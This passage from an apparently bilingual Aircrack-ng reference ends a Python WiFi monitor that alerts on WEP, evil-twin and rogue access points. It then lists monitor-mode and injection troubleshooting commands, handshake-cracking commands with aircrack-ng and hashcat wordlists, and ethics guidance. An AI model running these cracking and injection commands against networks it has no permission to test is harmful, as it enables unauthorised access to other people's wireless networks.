'network': network
\\\\})
# Alert on WEP networks
if 'WEP' in network['privacy']:
alerts.append(\\\\{
'type': 'weak_encryption',
'severity': 'high',
'message': f"WEP network detected: \\\\{network['essid']\\\\} (\\\\{network['bssid']\\\\})",
'network': network
\\\\})
# Alert on potential evil twins
for known_network in self.known_networks:
if known_network != network_id:
known_essid = known_network.split('_', 1)[1]
if known_essid == network['essid']:
alerts.append(\\\\{
'type': 'potential_evil_twin',
'severity': 'high',
'message': f"Potential evil twin detected: \\\\{network['essid']\\\\} (\\\\{network['bssid']\\\\})",
'network': network
\\\\})
# Check for high power levels (potential rogue AP)
try:
power = int(network['power'])
if power > -30: # Very high signal strength
alerts.append(\\\\{
'type': 'high_power_ap',
'severity': 'medium',
'message': f"High power AP detected: \\\\{network['essid']\\\\} (\\\\{network['bssid']\\\\}) - Power: \\\\{power\\\\}dBm",
'network': network
\\\\})
except ValueError:
pass
return alerts
def send_alert(self, alert):
"""Send alert notification"""
self.logger.warning(f"ALERT [\\\\{alert['severity'].upper()\\\\}]: \\\\{alert['message']\\\\}")
# Send email if configured
if self.config.get('email', \\\\{\\\\}).get('enabled', False):
self.send_email_alert(alert)
# Send to SIEM if configured
if self.config.get('siem', \\\\{\\\\}).get('enabled', False):
self.send_siem_alert(alert)
def send_email_alert(self, alert):
"""Send email alert"""
try:
email_config = self.config['email']
msg = MimeMultipart()
msg['From'] = email_config['from']
msg['To'] = email_config['to']
msg['Subject'] = f"WiFi Security Alert - \\\\{alert['type']\\\\}"
body = f"""
WiFi Security Alert
Type: \\\\{alert['type']\\\\}
Severity: \\\\{alert['severity']\\\\}
Message: \\\\{alert['message']\\\\}
Timestamp: \\\\{datetime.now().isoformat()\\\\}
Network Details:
BSSID: \\\\{alert['network']['bssid']\\\\}
ESSID: \\\\{alert['network']['essid']\\\\}
Channel: \\\\{alert['network']['channel']\\\\}
Encryption: \\\\{alert['network']['privacy']\\\\}
Power: \\\\{alert['network']['power']\\\\} dBm
This is an automated alert from the WiFi monitoring system.
"""
msg.attach(MimeText(body, 'plain'))
server = smtplib.SMTP(email_config['smtp_server'], email_config['port'])
if email_config.get('use_tls', True):
server.starttls()
if email_config.get('username'):
server.login(email_config['username'], email_config['password'])
server.send_message(msg)
server.quit()
except Exception as e:
self.logger.error(f"Failed to send email alert: \\\\{e\\\\}")
def send_siem_alert(self, alert):
"""Send alert to SIEM system"""
try:
import requests
siem_config = self.config['siem']
siem_event = \\\\{
'timestamp': datetime.now().isoformat(),
'source': 'wifi_monitor',
'event_type': alert['type'],
'severity': alert['severity'],
'message': alert['message'],
'network': alert['network']
\\\\}
response = requests.post(
siem_config['url'],
json=siem_event,
headers=\\\\{'Authorization': f"Bearer \\\\{siem_config['token']\\\\}"\\\\},
timeout=10
)
if response.status_code != 200:
self.logger.error(f"Failed to send SIEM alert: \\\\{response.status_code\\\\}")
except Exception as e:
self.logger.error(f"Error sending SIEM alert: \\\\{e\\\\}")
def run_continuous_monitoring(self):
"""Run continuous WiFi monitoring"""
self.logger.info("Starting continuous WiFi monitoring")
while True:
try:
self.logger.info("Scanning for wireless networks...")
networks = self.scan_networks()
if networks:
self.logger.info(f"Found \\\\{len(networks)\\\\} networks")
# Detect anomalies
alerts = self.detect_anomalies(networks)
# Send alerts
for alert in alerts:
self.send_alert(alert)
# Save scan results
with open('/var/log/wifi_scan_results.json', 'a') as f:
for network in networks:
f.write(json.dumps(network) + '\n')
else:
self.logger.info("No networks found")
# Wait for next scan
self.logger.info(f"Waiting \\\\{self.scan_interval\\\\} seconds for next scan...")
time.sleep(self.scan_interval)
except KeyboardInterrupt:
self.logger.info("Monitoring stopped by user")
break
except Exception as e:
self.logger.error(f"Error in monitoring loop: \\\\{e\\\\}")
time.sleep(60) # Wait before retrying
# Configuration
config = \\\\{
'interface': 'wlan0mon',
'scan_interval': 300, # 5 minutes
'email': \\\\{
'enabled': True,
'smtp_server': 'smtp.company.com',
'port': 587,
'use_tls': True,
'username': 'monitor@company.com',
'password': 'password',
'from': 'wifi-monitor@company.com',
'to': 'security@company.com'
\\\\},
'siem': \\\\{
'enabled': False,
'url': 'https://siem.company.com/api/events',
'token': 'your-api-token'
\\\\}
\\\\}
# Usage
if __name__ == "__main__":
monitor = WiFiMonitor(config)
monitor.run_continuous_monitoring()
Troubleshooting¶
Common Issues¶
Monitor Mode Issues:
# Check if interface supports monitor mode
iw list|grep -A 10 "Supported interface modes"
# Kill interfering processes
sudo airmon-ng check kill
# Manually set monitor mode
sudo ip link set wlan0 down
sudo iw dev wlan0 set type monitor
sudo ip link set wlan0 up
# Check monitor mode status
iwconfig wlan0
No Networks Detected:
# Check interface status
iwconfig
sudo iw dev
# Verify monitor mode
iwconfig wlan0mon|grep Mode
# Check for hardware issues
dmesg|grep -i wifi
lsusb|grep -i wireless
# Try different channels
sudo iwconfig wlan0mon channel 1
sudo iwconfig wlan0mon channel 6
sudo iwconfig wlan0mon channel 11
Injection Issues:
# Test injection capability
sudo aireplay-ng --test wlan0mon
# Check for packet injection support
sudo aireplay-ng --test wlan1mon
# Verify driver support
lsmod|grep -i wireless
dmesg|grep -i driver
Optimización de Rendimiento¶
Optimizando el rendimiento de Aircrack-ng:
# Use multiple CPU cores for cracking
aircrack-ng -p 4 capture.cap
# Optimize airodump-ng
sudo airodump-ng --band abg wlan0mon # Scan all bands
sudo airodump-ng -M wlan0mon # Enable manufacturer lookup
# Use faster wordlists
# Create optimized wordlist
sort wordlist.txt|uniq > optimized_wordlist.txt
# Use GPU acceleration with hashcat
aircrack-ng -J hashcat_format capture.cap
hashcat -m 2500 -w 3 hashcat_format.hccapx wordlist.txt
Consideraciones de Seguridad¶
Uso Ético¶
Consideraciones Legales: - Solo pruebe redes que le pertenezcan o para las que tenga permiso explícito - Comprenda las leyes locales relacionadas con pruebas de seguridad inalámbrica - Obtenga la autorización adecuada antes de realizar evaluaciones - Documente todas las actividades de prueba para fines de cumplimiento - Respete la privacidad y confidencialidad de los datos capturados
Seguridad Operacional: - Use Aircrack-ng en entornos de prueba aislados cuando sea posible - Implemente controles de acceso adecuados para los datos capturados - Asegure el almacenamiento y transmisión de información sensible - Actualizaciones regulares de Aircrack-ng y dependencias - Monitoree la detección por sistemas de detección de intrusiones inalámbricas
Protección de Datos¶
Seguridad de Datos Capturados: - Encripte handshakes y tráfico capturados - Implemente eliminación segura de archivos temporales - Use canales seguros para la transmisión de datos - Implemente políticas de retención de datos - Evaluaciones de seguridad regulares de la infraestructura de pruebas
Referencias¶
https://www.aircrack-ng.org/Sitio Web Oficial de Aircrack-nghttps://owasp.org/www-project-web-security-testing-guide/Documentación de Aircrack-nghttps://standards.ieee.org/standard/802_11-2020.html[Guía de Pruebas de Seguridad WiFi](